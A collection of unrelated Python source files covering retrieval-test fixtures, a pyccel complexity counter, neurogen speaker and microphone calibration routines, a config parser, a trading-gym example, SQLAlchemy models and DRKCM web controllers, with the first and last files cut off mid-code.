"The inhibition of AICAR suppresses the phosphorylation of TBC1D1.",
"TBC1D1 phosphorylation is increased by AICAR, but only responds minimally to contraction.",
"Ras and Mek are in proximity, and they phosphorylate ASPP2.",
"Ras and Mek are in proximity, and ASPP2 phosphorylates them.",
]
@pytest.fixture(scope="module")
def dummy_request_with_test() -> Request:
request = {
"query": {
"uid": "9887103",
"text": "The Drosophila activin receptor baboon signals through dSmad2 and controls...",
},
"documents": [
{
"uid": "9887103",
"text": "The Drosophila activin receptor baboon signals through dSmad2 and...",
},
{
"uid": "30049242",
"text": "Transcriptional up-regulation of the TGF-β intracellular signaling...",
},
{
"uid": "22936248",
"text": "High-fidelity promoter profiling reveals widespread alternative...",
},
],
"top_k": 3,
}
# We don't actually test scores, so use a dummy value of -1
response = [{"uid": "30049242", "score": -1}, {"uid": "22936248", "score": -1}]
return json.dumps(request), response
@pytest.fixture(scope="module")
def followup_request_with_test() -> Request:
request = {
"query": {
"uid": "9813169",
"text": "TGF-beta signaling from the cell surface to the nucleus is mediated by the SMAD...",
},
"documents": [
{
"uid": "10320478",
"text": "Much is known about the three subfamilies of the TGFbeta superfamily in vertebrates...",
},
{
"uid": "10357889",
"text": "The transforming growth factor-beta (TGF-beta) superfamily encompasses a large...",
},
{
"uid": "15473904",
"text": "Members of TGFbeta superfamily are found to play important roles in many cellular...",
},
],
"docs_only": True,
}
# We don't actually test scores, so use a dummy value of -1
response = [
{"uid": "10320478", "score": -1},
{"uid": "10357889", "score": -1},
{"uid": "15473904", "score": -1},
]
return json.dumps(request), response
|
# coding: utf-8
from sympy import count_ops as sympy_count_ops
from sympy import Tuple
from sympy.core.expr import Expr
from sympy.utilities.iterables import iterable
from pyccel.ast import (For, Assign, While,NewLine,
FunctionDef, Import, Print,
Comment, AnnotatedComment,
If, Zeros, Ones, Array,
Len, Dot, IndexedElement)
from pyccel.complexity.basic import Complexity
__all__ = ["count_ops", "OpComplexity"]
class OpComplexity(Complexity):
"""class for Operation complexity computation."""
def cost(self):
"""
        Computes the operation-count complexity of the given code.
"""
return count_ops(self.ast, visual=True)
def count_ops(expr, visual=None):
if isinstance(expr, Assign):
return sympy_count_ops(expr.rhs, visual)
elif isinstance(expr, For):
a = expr.iterable.size
ops = sum(count_ops(i, visual) for i in expr.body)
return a*ops
elif isinstance(expr, Tuple):
return sum(count_ops(i, visual) for i in expr)
elif isinstance(expr, (Zeros, Ones,NewLine)):
return 0
else:
raise NotImplementedError('TODO count_ops for {}'.format(type(expr)))
##############################################
if __name__ == "__main__":
code = '''
n = 10
for i in range(0,n):
for j in range(0,n):
x = pow(i,2) + pow(i,3) + 3*i
y = x / 3 + 2* x
'''
complexity = OpComplexity(code)
print((complexity.cost()))
|
import logging
log = logging.getLogger(__name__)
import threading
import numpy as np
from neurogen import block_definitions as blocks
from neurogen.calibration import (PointCalibration, InterpCalibration,
CalibrationError, CalibrationTHDError,
CalibrationNFError)
from neurogen import generate_waveform
from neurogen.util import db
from neurogen.calibration.util import (tone_power_conv, csd, psd_freq, thd,
golay_pair, golay_transfer_function)
from .. import nidaqmx as ni
################################################################################
# Utility tone calibration functions
################################################################################
thd_err_mesg = 'Total harmonic distortion for {:0.1f}Hz is {:0.2f}%'
nf_err_mesg = 'Power at {:0.1f}Hz of {:0.1f}dB near noise floor of {:0.1f}dB'
def _to_sens(output_spl, output_gain, vrms):
# Convert SPL to value expected at 0 dB gain and 1 VRMS
norm_spl = output_spl-output_gain-db(vrms)
return -norm_spl-db(20e-6)
def _process_tone(frequency, fs, nf_signal, signal, min_db, max_thd):
rms = tone_power_conv(signal, fs, frequency, 'flattop')
rms_average = np.mean(rms, axis=0)
if max_thd is not None:
measured_thd = thd(signal, fs, frequency, 3, 'flattop')
measured_thd_average = np.mean(measured_thd, axis=0)
else:
measured_thd_average = np.full_like(rms_average, np.nan)
if min_db is not None:
nf_rms = tone_power_conv(nf_signal, fs, frequency, 'flattop')
nf_rms_average = np.mean(nf_rms, axis=0)
else:
nf_rms_average = np.full_like(rms_average, np.nan)
for n, s, t in zip(nf_rms_average, rms_average, measured_thd_average):
mesg = 'Noise floor {:.1f}dB, signal {:.1f}dB, THD {:.2f}%'
log.debug(mesg.format(db(n), db(s), t*100))
_check_calibration(frequency, s, n, min_db, t, max_thd)
return rms_average
def _check_calibration(frequency, rms, nf_rms, min_db, thd, max_thd):
if min_db is not None and (db(rms, nf_rms) < min_db):
m = nf_err_mesg.format(frequency, db(rms), db(nf_rms))
raise CalibrationNFError(m)
if max_thd is not None and (thd > max_thd):
m = thd_err_mesg.format(frequency, thd*100)
raise CalibrationTHDError(m)
def tone_power(frequency, gain=0, vrms=1, repetitions=1, fs=200e3, max_thd=0.1,
min_db=10, duration=0.1, trim=0.01,
output_line=ni.DAQmxDefaults.PRIMARY_SPEAKER_OUTPUT,
input_line=ni.DAQmxDefaults.MIC_INPUT, debug=False):
calibration = InterpCalibration.as_attenuation(vrms=vrms)
trim_n = int(trim*fs)
token = blocks.Tone(frequency=frequency, level=0)
waveform = generate_waveform(token, fs, duration=duration,
calibration=calibration, vrms=vrms)
daq_kw = {
'waveform': waveform,
'repetitions': repetitions,
'output_line': output_line,
'input_line': input_line,
'gain': gain,
'adc_fs': fs,
'dac_fs': fs,
'iti': 0.01
}
signal = ni.acquire_waveform(**daq_kw)[:, :, trim_n:-trim_n]
# Measure the noise floor
if min_db is not None:
token = blocks.Silence()
daq_kw['waveform'] = generate_waveform(token, fs, duration=duration,
calibration=calibration,
vrms=vrms)
nf_signal = ni.acquire_waveform(**daq_kw)
nf_signal = nf_signal[:, :, trim_n:-trim_n]
else:
nf_signal = np.full_like(signal, np.nan)
result = _process_tone(frequency, fs, nf_signal, signal, min_db, max_thd)
if debug:
return result, signal, nf_signal
else:
return result
def tone_spl(frequency, input_calibration, *args, **kwargs):
rms = tone_power(frequency, *args, **kwargs)[0]
return input_calibration.get_spl(frequency, rms)
def tone_sens(frequency, input_calibration, gain=-50, vrms=1, *args, **kwargs):
output_spl = tone_spl(frequency, input_calibration, gain, vrms, *args,
**kwargs)
mesg = 'Output {:.2f}dB SPL at {:.2f}Hz, {:.2f}dB gain, {:.2f}Vrms'
log.debug(mesg.format(output_spl, frequency, gain, vrms))
output_sens = _to_sens(output_spl, gain, vrms)
return output_sens
def tone_calibration(frequency, *args, **kwargs):
'''
Single output calibration at a fixed frequency
Returns
-------
sens : dB (V/Pa)
Sensitivity of output in dB (V/Pa).
'''
output_sens = tone_sens(frequency, *args, **kwargs)
return PointCalibration(frequency, output_sens)
def multitone_calibration(frequencies, *args, **kwargs):
output_sens = [tone_sens(f, *args, **kwargs) for f in frequencies]
return PointCalibration(frequencies, output_sens)
def tone_ref_calibration(frequency, gain, input_line=ni.DAQmxDefaults.MIC_INPUT,
reference_line=ni.DAQmxDefaults.REF_MIC_INPUT,
ref_mic_sens=0.922e-3, *args, **kwargs):
kwargs['input_line'] = ','.join((input_line, reference_line))
mic, ref_mic = db(tone_power(frequency, gain, *args, **kwargs))
sens = mic+db(ref_mic_sens)-ref_mic
return sens
def tone_calibration_search(frequency, input_calibration, gains, vrms=1,
callback=None, *args, **kwargs):
for gain in gains:
try:
if callback is not None:
callback(gain)
return tone_calibration(frequency, input_calibration, gain, vrms,
*args, **kwargs)
except CalibrationError:
pass
else:
raise SystemError('Could not calibrate speaker')
def two_tone_power(f1_frequency, f2_frequency, f1_gain=-50.0, f2_gain=-50.0,
f1_vrms=1, f2_vrms=1, repetitions=1, fs=200e3,
max_thd=0.01, min_db=10, duration=0.1, trim=0.01):
'''
Dual output calibration with each output at a different frequency
.. note::
If one frequency is a harmonic of the other, the calibration will fail
due to the THD measure. This function is typically most useful for
calibration of the f1 and f2 DPOAE frequencies (which are not harmonics
of each other).
'''
cal1 = InterpCalibration.as_attenuation(vrms=f1_vrms)
cal2 = InterpCalibration.as_attenuation(vrms=f2_vrms)
trim_n = int(trim*fs)
t1 = blocks.Tone(frequency=f1_frequency, level=0)
t2 = blocks.Tone(frequency=f2_frequency, level=0)
w1 = generate_waveform(t1, fs, duration, cal1)[np.newaxis]
w2 = generate_waveform(t2, fs, duration, cal2)[np.newaxis]
waveforms = np.concatenate((w1, w2), axis=0)
daq_kw = {
'waveform': waveforms,
'repetitions': repetitions,
'output_line': ni.DAQmxDefaults.DUAL_SPEAKER_OUTPUT,
'input_line': ni.DAQmxDefaults.MIC_INPUT,
'gain': [f1_gain, f2_gain],
'adc_fs': fs,
'dac_fs': fs,
'iti': 0.01
}
signal = ni.acquire_waveform(**daq_kw)[:, :, trim_n:-trim_n]
# Measure the noise floor
if min_db is not None:
token = blocks.Silence()
w1 = generate_waveform(token, fs, duration, cal1)[np.newaxis]
w2 = generate_waveform(token, fs, duration, cal2)[np.newaxis]
daq_kw['waveform'] = np.concatenate((w1, w2), axis=0)
nf_signal = ni.acquire_waveform(**daq_kw)[:, :, trim_n:-trim_n]
else:
nf_signal = np.full_like(signal, np.nan)
f1 = _process_tone(f1_frequency, fs, nf_signal, signal, min_db, max_thd)
f2 = _process_tone(f2_frequency, fs, nf_signal, signal, min_db, max_thd)
return f1, f2
def two_tone_spl(f1_frequency, f2_frequency, input_calibration, *args,
**kwargs):
'''
Dual measurement of output SPL
.. note::
If one frequency is a harmonic of the other, the calibration will fail
due to the THD measure. This function is typically most useful for
calibration of the f1 and f2 DPOAE frequencies (which are not harmonics
of each other).
'''
f1_rms, f2_rms = two_tone_power(f1_frequency, f2_frequency, *args, **kwargs)
f1_spl = input_calibration.get_spl(f1_frequency, f1_rms)[0]
f2_spl = input_calibration.get_spl(f2_frequency, f2_rms)[0]
return f1_spl, f2_spl
def two_tone_calibration(f1_frequency, f2_frequency, input_calibration,
f1_gain=-50, f2_gain=-50, f1_vrms=1, f2_vrms=1, *args,
**kwargs):
'''
Dual output calibration with each output at a different frequency
.. note::
If one frequency is a harmonic of the other, the calibration will fail
due to the THD measure. This function is typically most useful for
calibration of the f1 and f2 DPOAE frequencies (which are not harmonics
of each other).
'''
f1_spl, f2_spl = two_tone_spl(f1_frequency, f2_frequency, input_calibration,
f1_gain, f2_gain, f1_vrms, f2_vrms, *args,
**kwargs)
mesg = '{} output {:.2f}dB SPL at {:.2f}Hz, {:.2f}dB gain, {:.2f}Vrms'
log.debug(mesg.format('Primary', f1_spl, f1_frequency, f1_gain, f1_vrms))
log.debug(mesg.format('Secondary', f2_spl, f2_frequency, f2_gain, f2_vrms))
f1_sens = _to_sens(f1_spl, f1_gain, f1_vrms)
f2_sens = _to_sens(f2_spl, f2_gain, f2_vrms)
return PointCalibration(f1_frequency, f1_sens), \
PointCalibration(f2_frequency, f2_sens)
def ceiling_spl(frequency, max_spl=80, initial_gain=-40, vrms=1, spl_step=5,
gain_step=5, **cal_kw):
'''
Return maximum SPL at given frequency without distortion of output
'''
step_size = gain_step
last_step = None
ceiling_spl = None
output_gain = initial_gain
# Determine the starting output gain to achieve the maximum output. At this
# point we are going to ignore THD; however, we need to make sure we are
# measuring above the noise floor.
initial_cal_kw = cal_kw.copy()
initial_cal_kw['max_thd'] = np.inf
while True:
try:
spl = tone_calibration(frequency, output_gain, **initial_cal_kw)
output_gain += max_spl-spl
output_gain = np.round(output_gain/0.5)*0.5
break
except CalibrationNFError:
output_gain += step_size
while True:
try:
spl = tone_calibration(frequency, output_gain, **cal_kw)
if np.abs(spl-max_spl) < 1:
ceiling_spl = spl
break
else:
output_gain += max_spl-spl
output_gain = np.round(output_gain/0.5)*0.5
last_step = max_spl-spl
except CalibrationNFError:
# We have descended too close to the noise floor
if last_step is not None and last_step < 0:
step_size = int(step_size/2)
output_gain += step_size
last_step = step_size
except CalibrationTHDError:
max_spl -= spl_step
if last_step is not None and last_step > 0:
step_size = int(step_size/2)
output_gain -= step_size
last_step = -step_size
if step_size <= 1:
break
if ceiling_spl is None:
raise CalibrationError('Could not determine maximum SPL')
mesg = 'Maximum output at {:.1f}Hz is {:.1f}dB SPL'
log.debug(mesg.format(frequency, ceiling_spl))
return ceiling_spl
def mic_sens(frequency, ref_input, exp_input, ref_calibration, *args, **kwargs):
'''
Compute sensitivity of experiment microphone (e.g. probe tube microphone)
based on the reference microphone and sensitivity for the reference
microphone.
Parameters
----------
frequency : float (Hz)
Frequency to calibrate at
ref_input : str
niDAQmx input channel for reference microphone
exp_input : str
niDAQmx input channel for experiment microphone
'''
mic_input = ','.join((ref_input, exp_input))
ref_power, exp_power = tone_power(frequency, *args, input_line=mic_input,
**kwargs)
ref_sens = ref_calibration.get_sens()
return db(exp_power)+db(ref_power)-db(ref_sens)
################################################################################
# Utility chirp calibration functions
################################################################################
def get_chirp_transform(vrms, start_atten=6, end_atten=-6, start_frequency=0,
end_frequency=100e3):
frequencies = [start_frequency, end_frequency]
magnitude = [start_atten, end_atten]
return InterpCalibration.from_spl(frequencies, magnitude, vrms)
class CalibrationResult(object):
pass
class ChirpCalibration(object):
def __init__(self, freq_lb=50, freq_ub=100e3, start_atten=0, end_atten=0,
vrms=1, gain=0, repetitions=32, duration=0.1, rise_time=0.001,
iti=0.01, fs=200e3, input_range=10,
output_line=ni.DAQmxDefaults.PRIMARY_SPEAKER_OUTPUT,
input_line=ni.DAQmxDefaults.MIC_INPUT, callback=None):
# By using an Attenuation calibration (generated by get_chirp_transform)
# and setting tone level to 0, a sine wave at the given amplitude (as
# specified in the settings) will be generated at each frequency as the
# reference.
calibration = get_chirp_transform(vrms, start_atten, end_atten)
ramp = blocks.LinearRamp(name='sweep')
token = blocks.Tone(name='tone', level=0, frequency=ramp) >> \
blocks.Cos2Envelope(name='envelope')
token.set_value('sweep.ramp_duration', duration)
token.set_value('envelope.duration', duration)
token.set_value('envelope.rise_time', rise_time)
token.set_value('sweep.start', freq_lb)
token.set_value('sweep.stop', freq_ub)
waveform = generate_waveform(token, fs, duration=duration,
calibration=calibration, vrms=vrms)
daq_kw = {
'waveform': waveform,
'repetitions': repetitions,
'output_line': output_line,
'input_line': input_line,
'gain': gain,
'adc_fs': fs,
'dac_fs': fs,
'iti': iti,
'callback': callback,
'output_range': 10,
'input_range': input_range,
}
self.iface_acquire = ni.DAQmxAcquireWaveform(**daq_kw)
self.fs = fs
self.sig_waveform = waveform
self.iti = iti
def acquire(self, join=True):
self.iface_acquire.start()
if join:
self.iface_acquire.join()
def process(self, fft_window='boxcar', waveform_averages=4,
input_gains=None):
# Subtract one from the trim because the DAQmx interface is configured
# to acquire one sample less than int(waveform_duration+iti). This
# allows the card to be reset properly so it can acquire on the next
# trigger.
time = np.arange(self.sig_waveform.shape[-1])/self.fs
mic_waveforms = self.iface_acquire.get_waveforms(remove_iti=True)
if mic_waveforms.shape[-1] != self.sig_waveform.shape[-1]:
raise ValueError('shapes do not match')
if input_gains is not None:
# Correct for measurement gain settings
input_gains = np.asarray(input_gains)[..., np.newaxis]
mic_waveforms = mic_waveforms/input_gains
mic_frequency = psd_freq(mic_waveforms[0, 0, :], self.fs)
sig_frequency = psd_freq(self.sig_waveform, self.fs)
mic_csd = csd(mic_waveforms, self.fs, fft_window, waveform_averages)
mic_phase = np.unwrap(np.angle(mic_csd)).mean(axis=0)
mic_psd = np.mean(2*np.abs(mic_csd)/np.sqrt(2.0), axis=0)
sig_csd = csd(self.sig_waveform, self.fs, fft_window)
sig_phase = np.unwrap(np.angle(sig_csd))
sig_psd = 2*np.abs(sig_csd)/np.sqrt(2.0)
return {
'fs': self.fs,
'mic_frequency': mic_frequency,
'sig_frequency': sig_frequency,
'mic_psd': mic_psd,
'sig_psd': sig_psd,
'mic_phase_raw': mic_phase,
'mic_phase': mic_phase-sig_phase[np.newaxis],
'sig_phase': sig_phase,
'time': time,
'sig_waveform': self.sig_waveform,
'mic_waveforms': mic_waveforms,
}
def chirp_power(waveform_averages=4, fft_window='boxcar', **kwargs):
c = ChirpCalibration(**kwargs)
c.acquire()
return c.process(fft_window, waveform_averages)
class GolayCalibration(object):
def __init__(self, n=16, vpp=1, gain=0, repetitions=1, iti=0.01,
ab_delay=2, fs=200e3, input_range=10,
output_line=ni.DAQmxDefaults.PRIMARY_SPEAKER_OUTPUT,
input_line=ni.DAQmxDefaults.MIC_INPUT, callback=None):
self.a, self.b = golay_pair(n)
self.a *= vpp
self.b *= vpp
self.daq_kw = {
'repetitions': repetitions,
'output_line': output_line,
'input_line': input_line,
'gain': gain,
'adc_fs': fs,
'dac_fs': fs,
'iti': iti,
'callback': self.poll,
'input_range': input_range,
'output_range': vpp,
}
self.running = None
self.callback = callback
self.ab_delay = ab_delay
self.fs = fs
self.vpp = vpp
def poll(self, epochs_acquired, complete):
if complete and self.running == 'a':
self.a_waveforms = \
self.iface_acquire.get_waveforms(remove_iti=True)
self.callback(epochs_acquired, False)
threading.Timer(self.ab_delay, self.acquire_b).start()
elif complete and self.running == 'b':
self.b_waveforms = \
self.iface_acquire.get_waveforms(remove_iti=True)
self.callback(epochs_acquired, True)
else:
self.callback(epochs_acquired, False)
def acquire(self, join=True):
self.acquire_a()
def acquire_a(self):
self.running = 'a'
self.iface_acquire = \
ni.DAQmxAcquireWaveform(waveform=self.a, **self.daq_kw)
self.iface_acquire.start()
def acquire_b(self):
self.running = 'b'
self.iface_acquire = \
ni.DAQmxAcquireWaveform(waveform=self.b, **self.daq_kw)
self.iface_acquire.start()
def process(self, waveform_averages, input_gains=None, discard=1,
smoothing_window=5):
result = summarize_golay(self.fs, self.a, self.b,
self.a_waveforms[discard:],
self.b_waveforms[discard:],
waveform_averages,
input_gains)
mic_waveforms = np.concatenate((self.a_waveforms, self.b_waveforms),
axis=-1)
sig_waveform = np.concatenate((self.a, self.b), axis=-1)
sig_csd = csd(sig_waveform, self.fs)
sig_phase = np.unwrap(np.angle(sig_csd))
sig_psd = 2*np.abs(sig_csd)/np.sqrt(2.0)
sig_frequency = psd_freq(sig_waveform, self.fs)
result.update({
'mic_waveforms': mic_waveforms,
'sig_waveform': sig_waveform,
'sig_psd': sig_psd,
'sig_phase': sig_phase,
'sig_frequency': sig_frequency,
})
return result
def summarize_golay(fs, a, b, a_response, b_response, waveform_averages=None,
input_gains=None):
n_epochs, n_channels, n_time = a_response.shape
if waveform_averages is not None:
new_shape = (waveform_averages, -1, n_channels, n_time)
a_response = a_response.reshape(new_shape).mean(axis=0)
b_response = b_response.reshape(new_shape).mean(axis=0)
if input_gains is not None:
# Correct for measurement gain settings
input_gains = np.asarray(input_gains)[..., np.newaxis]
a_response = a_response/input_gains
b_response = b_response/input_gains
time = np.arange(a_response.shape[-1])/fs
freq, tf_psd, tf_phase = golay_transfer_function(a, b, a_response,
b_response, fs)
tf_psd = tf_psd.mean(axis=0)
tf_phase = tf_phase.mean(axis=0)
return {
'fs': fs,
'a': a,
'b': b,
'a_response': a_response,
'b_response': b_response,
'time': time,
'tf_psd': tf_psd,
'tf_phase': tf_phase,
'mic_frequency': freq,
}
def golay_tf(*args, **kwargs):
c = GolayCalibration(*args, **kwargs)
c.acquire()
return c.process()
|
import configparser
import logging
import os
from pathlib import Path
from . import consts
logger = logging.getLogger()
def read_config(path):
config = configparser.ConfigParser()
config.read(path)
return config
def parse_config(args):
default_config_path = os.path.expanduser('~/.eden')
if not os.path.exists(default_config_path):
os.makedirs(default_config_path)
config_file_path = os.path.expanduser(args['config_path'])
config_file = Path(config_file_path)
if not config_file.is_file():
logger.info(f"Config file {config_file} is empty")
return None
return read_config(config_file)
def config_write_overrides(args, config, profile_name, fail_on_missing_non_default_profile=True):
updated = False
if profile_name not in config:
config[profile_name] = {}
if profile_name != consts.DEFAULT_PROFILE_NAME and fail_on_missing_non_default_profile:
logger.error("")
return None, None
for parameter in consts.parameters:
key = parameter['name']
if key not in args:
continue
value = args[key]
if value is None:
continue
logger.info(f"Setting {key} to {value} in profile {profile_name}")
config[profile_name][key] = value
updated = True
return config, updated
def check_profile(config, profile):
errors = 0
if profile == "DEFAULT":
logger.debug("Skipping ConfigParser DEFAULT profile (comes up even if not in file)")
return 0
if profile not in config:
logger.error(f"Profile {profile} is not in config file")
errors += 1
return errors
for parameter in consts.parameters:
key = parameter['name']
if key not in config[profile]:
logger.error(f"Necessary key {key} is not provided for profile {profile}")
errors += 1
continue
value = config[profile][key]
if value is None:
logger.error(f"Necessary key {key} is None for profile {profile}")
errors += 1
continue
if not parameter['validator'](value):
logger.error(f"Validation failed for key {key} in profile {profile}")
errors += 1
continue
for k in config[profile]:
if k not in consts.parameter_names:
logger.error(f"Unknown config key {k} in profile {profile}")
errors += 1
continue
return errors
def create_envvar_dict(args, config, profile_name):
variables = {}
for parameter in consts.parameters:
parameter_name = parameter['name']
envvar_name = parameter['envvar_name']
if parameter_name in args:
if args[parameter_name] is not None:
variables[envvar_name] = args[parameter_name]
continue
if profile_name not in config or parameter_name not in config[profile_name]:
logger.error(f"Necessary parameter {parameter_name} not found in profile {profile_name} "
f"and is not provided as an argument")
exit(-1)
else:
variables[envvar_name] = config[profile_name][parameter_name]
return variables
def dump_profile(args, config, profile_name):
variables = {}
for parameter in consts.parameters:
parameter_name = parameter['name']
if parameter_name in args:
if args[parameter_name] is not None:
variables[parameter_name] = args[parameter_name]
continue
if profile_name not in config or parameter_name not in config[profile_name]:
logger.error(f"Necessary parameter {parameter_name} not found in profile {profile_name} "
f"and is not provided as an argument")
exit(-1)
else:
variables[parameter_name] = config[profile_name][parameter_name]
return variables
|
"""
The aim of this file is to give a standalone example of how an environment runs.
"""
import os
import numpy as np
from tgym.core import DataGenerator
from tgym.envs.trading_tick import TickTrading
from tgym.gens.deterministic import WavySignal, RandomGenerator
from tgym.gens.csvstream import CSVStreamer
gen_type = 'C'
if gen_type == 'W':
    generator = WavySignal(period_1=25, period_2=50, epsilon=-0.5, ba_spread=0.0001)
elif gen_type == 'R':
    generator = RandomGenerator(spread=0.0001, range_low=1.0, range_high=2.0)
elif gen_type == 'C':
filename = r'./examples/price_usdeur.csv'
generator = CSVStreamer(filename=filename)
episode_length = 200000
trading_fee = 0.2
time_fee = 0
# history_length number of historical states in the observation vector.
history_length = 2
profit_taken = 10
stop_loss = -5
render_show = False
environment = TickTrading( data_generator=generator,
trading_fee=trading_fee,
time_fee=time_fee,
history_length=history_length,
episode_length=episode_length,
profit_taken = profit_taken,
stop_loss = stop_loss)
if render_show :
environment.render()
i = 0
while True:
#action = input("Action: Buy (b) / Sell (s) / Hold (enter): ")
# if action == 'b':
# action = [0, 1, 0]
# elif action == 's':
# action = [0, 0, 1]
# else:
# action = [1, 0, 0]
    # a crude pseudo-random action pattern (buy/sell/hold encoded as one-hot vectors)
action = [0, 1, 0] if i%7 == 0 else ([0, 0, 1] if i%13 == 0 else [1, 0, 0])
environment.step(action)
if render_show :
environment.render()
i += 1
|
from sqlalchemy import Column, Integer, String
from .database import Base
class Blog(Base):
__tablename__ = "blogs"
id = Column(Integer, primary_key=True, index=True)
title = Column(String)
body = Column(String)
class User(Base):
__tablename__ = "users"
id = Column(Integer, primary_key=True, index=True)
name = Column(String)
email = Column(String)
password = Column(String)
|
"""
Custom Controllers for DRKCM
License: MIT
"""
from gluon import current
from gluon.html import *
from gluon.storage import Storage
from core import FS, CustomController
THEME = "DRK"
# =============================================================================
class index(CustomController):
""" Custom Home Page """
def __call__(self):
output = {}
T = current.T
auth = current.auth
settings = current.deployment_settings
# Defaults
login_form = None
login_div = None
announcements = None
announcements_title = None
roles = current.session.s3.roles
sr = auth.get_system_roles()
if sr.AUTHENTICATED in roles:
# Logged-in user
# => display announcements
from core import S3DateTime
dtrepr = lambda dt: S3DateTime.datetime_represent(dt, utc=True)
filter_roles = roles if sr.ADMIN not in roles else None
posts = self.get_announcements(roles=filter_roles)
# Render announcements list
announcements = UL(_class="announcements")
if posts:
announcements_title = T("Announcements")
priority_classes = {2: "announcement-important",
3: "announcement-critical",
}
priority_icons = {2: "fa-exclamation-circle",
3: "fa-exclamation-triangle",
}
for post in posts:
# The header
header = H4(post.name)
# Priority
priority = post.priority
# Add icon to header?
icon_class = priority_icons.get(post.priority)
if icon_class:
header = TAG[""](I(_class="fa %s announcement-icon" % icon_class),
header,
)
# Priority class for the box
prio = priority_classes.get(priority, "")
row = LI(DIV(DIV(DIV(dtrepr(post.date),
_class = "announcement-date",
),
_class="fright",
),
DIV(DIV(header,
_class = "announcement-header",
),
DIV(XML(post.body),
_class = "announcement-body",
),
_class="announcement-text",
),
_class = "announcement-box %s" % prio,
),
)
announcements.append(row)
else:
# Anonymous user
# => provide a login box
login_div = DIV(H3(T("Login")),
)
auth.messages.submit_button = T("Login")
login_form = auth.login(inline=True)
output = {"login_div": login_div,
"login_form": login_form,
"announcements": announcements,
"announcements_title": announcements_title,
}
# Custom view and homepage styles
self._view(settings.get_theme_layouts(), "index.html")
return output
# -------------------------------------------------------------------------
@staticmethod
def get_announcements(roles=None):
"""
Get current announcements
Args:
roles: filter announcement by these roles
Returns:
any announcements (Rows)
"""
db = current.db
s3db = current.s3db
# Look up all announcements
ptable = s3db.cms_post
stable = s3db.cms_series
join = stable.on((stable.id == ptable.series_id) & \
(stable.name == "Announcements") & \
(stable.deleted == False))
query = (ptable.date <= current.request.utcnow) & \
(ptable.expired == False) & \
(ptable.deleted == False)
if roles:
# Filter posts by roles
ltable = s3db.cms_post_role
q = (ltable.group_id.belongs(roles)) & \
(ltable.deleted == False)
rows = db(q).select(ltable.post_id,
cache = s3db.cache,
groupby = ltable.post_id,
)
post_ids = {row.post_id for row in rows}
query = (ptable.id.belongs(post_ids)) & query
posts = db(query).select(ptable.name,
ptable.body,
ptable.date,
ptable.priority,
join = join,
orderby = (~ptable.priority, ~ptable.date),
limitby = (0, 5),
)
return posts
# =============================================================================
class userstats(CustomController):
"""
Custom controller to provide user account statistics per
root organisation (for accounting in a shared instance)
"""
def __init__(self):
super(userstats, self).__init__()
self._root_orgs = None
self._stats = None
# -------------------------------------------------------------------------
def __call__(self):
""" The userstats controller """
# Require ORG_GROUP_ADMIN
auth = current.auth
if not auth.s3_has_role("ORG_GROUP_ADMIN"):
auth.permission.fail()
from core import S3CRUD, s3_get_extension, crud_request
request = current.request
args = request.args
        # Create a CRUDRequest
r = crud_request("org", "organisation",
c = "default",
f = "index/%s" % args[0],
args = args[1:],
extension = s3_get_extension(request),
)
# Filter to root organisations
resource = r.resource
resource.add_filter(FS("id").belongs(self.root_orgs))
# Configure field methods
from gluon import Field
table = resource.table
table.total_accounts = Field.Method("total_accounts", self.total_accounts)
table.active_accounts = Field.Method("active_accounts", self.active_accounts)
table.disabled_accounts = Field.Method("disabled_accounts", self.disabled_accounts)
table.active30 = Field.Method("active30", self.active30)
# Labels for field methods
T = current.T
TOTAL = T("Total User Accounts")
ACTIVE = T("Active")
DISABLED = T("Inactive")
ACTIVE30 = T("Logged-in Last 30 Days")
# Configure list_fields
list_fields = ("id",
"name",
(TOTAL, "total_accounts"),
(ACTIVE, "active_accounts"),
(DISABLED, "disabled_accounts"),
(ACTIVE30, "active30"),
)
# Configure form
from core import S3SQLCustomForm, S3SQLVirtualField
crud_form = S3SQLCustomForm("name",
S3SQLVirtualField("total_accounts",
label = TOTAL,
),
S3SQLVirtualField("active_accounts",
label = ACTIVE,
),
S3SQLVirtualField("disabled_accounts",
label = DISABLED,
),
S3SQLVirtualField("active30",
label = ACTIVE30,
),
)
# Configure read-only
resource.configure(insertable = False,
editable = False,
deletable = False,
crud_form = crud_form,
filter_widgets = None,
list_fields = list_fields,
)
output = r(rheader=self.rheader)
if isinstance(output, dict):
output["title"] = T("User Statistics")
# URL to open the resource
open_url = S3CRUD._linkto(r, update=False)("[id]")
# Add action button for open
action_buttons = S3CRUD.action_buttons
action_buttons(r,
deletable = False,
copyable = False,
editable = False,
read_url = open_url,
)
return output
# -------------------------------------------------------------------------
@staticmethod
def rheader(r):
"""
Show the current date in the output
Args:
r: the CRUDRequest
Returns:
the page header (rheader)
"""
from core import S3DateTime
today = S3DateTime.datetime_represent(r.utcnow, utc=True)
return P("%s: %s" % (current.T("Date"), today))
# -------------------------------------------------------------------------
@property
def root_orgs(self):
"""
A set of root organisation IDs (lazy property)
"""
root_orgs = self._root_orgs
if root_orgs is None:
db = current.db
s3db = current.s3db
table = s3db.org_organisation
query = (table.root_organisation == table.id) & \
(table.deleted == False)
rows = db(query).select(table.id)
self._root_orgs = root_orgs = set(row.id for row in rows)
return root_orgs
# -------------------------------------------------------------------------
@property
def stats(self):
"""
User account statistics per root organisation (lazy property)
"""
stats = self._stats
if stats is None:
db = current.db
s3db = current.s3db
utable = s3db.auth_user
otable = s3db.org_organisation
left = otable.on(otable.id == utable.organisation_id)
query = (utable.deleted == False)
users = db(query).select(otable.root_organisation,
utable.registration_key,
utable.timestmp,
left = left,
)
# Determine activity period start
import datetime
now = current.request.utcnow
start = (now - datetime.timedelta(days=30)).replace(hour = 0,
minute = 0,
second = 0,
microsecond = 0,
)
# Collect stats
stats = {}
for user in users:
account = user.auth_user
organisation = user.org_organisation
root_org = organisation.root_organisation
if not root_org:
continue
if root_org in stats:
org_stats = stats[root_org]
else:
org_stats = stats[root_org] = {"total": 0,
"disabled": 0,
"active30": 0,
}
# Count total accounts
org_stats["total"] += 1
# Count inactive accounts
if account.registration_key:
org_stats["disabled"] += 1
# Count accounts logged-in in the last 30 days
timestmp = account.timestmp
if timestmp and timestmp >= start:
org_stats["active30"] += 1
self._stats = stats
return stats
# -------------------------------------------------------------------------
def total_accounts(self, row):
"""
Field method to return the total number of user accounts
for the organisation
Args:
row: the Row
"""
if hasattr(row, "org_organisation"):
row = row.org_organisation
stats = self.stats.get(row.id)
return stats["total"] if stats else 0
# -------------------------------------------------------------------------
def active_accounts(self, row):
"""
Field method to return the number of active user accounts
for the organisation
Args:
row: the Row
"""
if hasattr(row, "org_organisation"):
row = row.org_organisation
stats = self.stats.get(row.id)
if stats:
